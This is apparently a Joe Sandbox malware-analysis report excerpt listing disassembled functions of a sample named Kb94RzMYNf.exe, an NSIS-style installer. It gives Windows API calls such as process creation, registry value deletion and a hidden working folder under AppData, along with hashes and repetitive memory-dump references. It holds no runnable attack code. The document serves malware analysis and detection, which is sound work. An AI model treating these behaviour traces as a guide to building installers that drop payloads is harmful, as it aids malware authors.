Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\neoimpressionism
API String ID: 1892508949-3269196450
Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D

Function 00405730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
CloseHandle.KERNEL32(?), ref: 00405766

Strings

Error launching installer, xrefs: 00405743

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629

Function 00405282 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405292

Part of subcall function 00404160: SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172

CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D

Function 0040642A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
GetProcAddress.KERNEL32(00000000,?), ref: 00406457

Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
Opcode Fuzzy Hash: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D

Function 00405C25 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405C00 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98

Function 004056FB Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
GetLastError.KERNEL32 ref: 0040570F

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00405CD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8

Function 00405CA8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
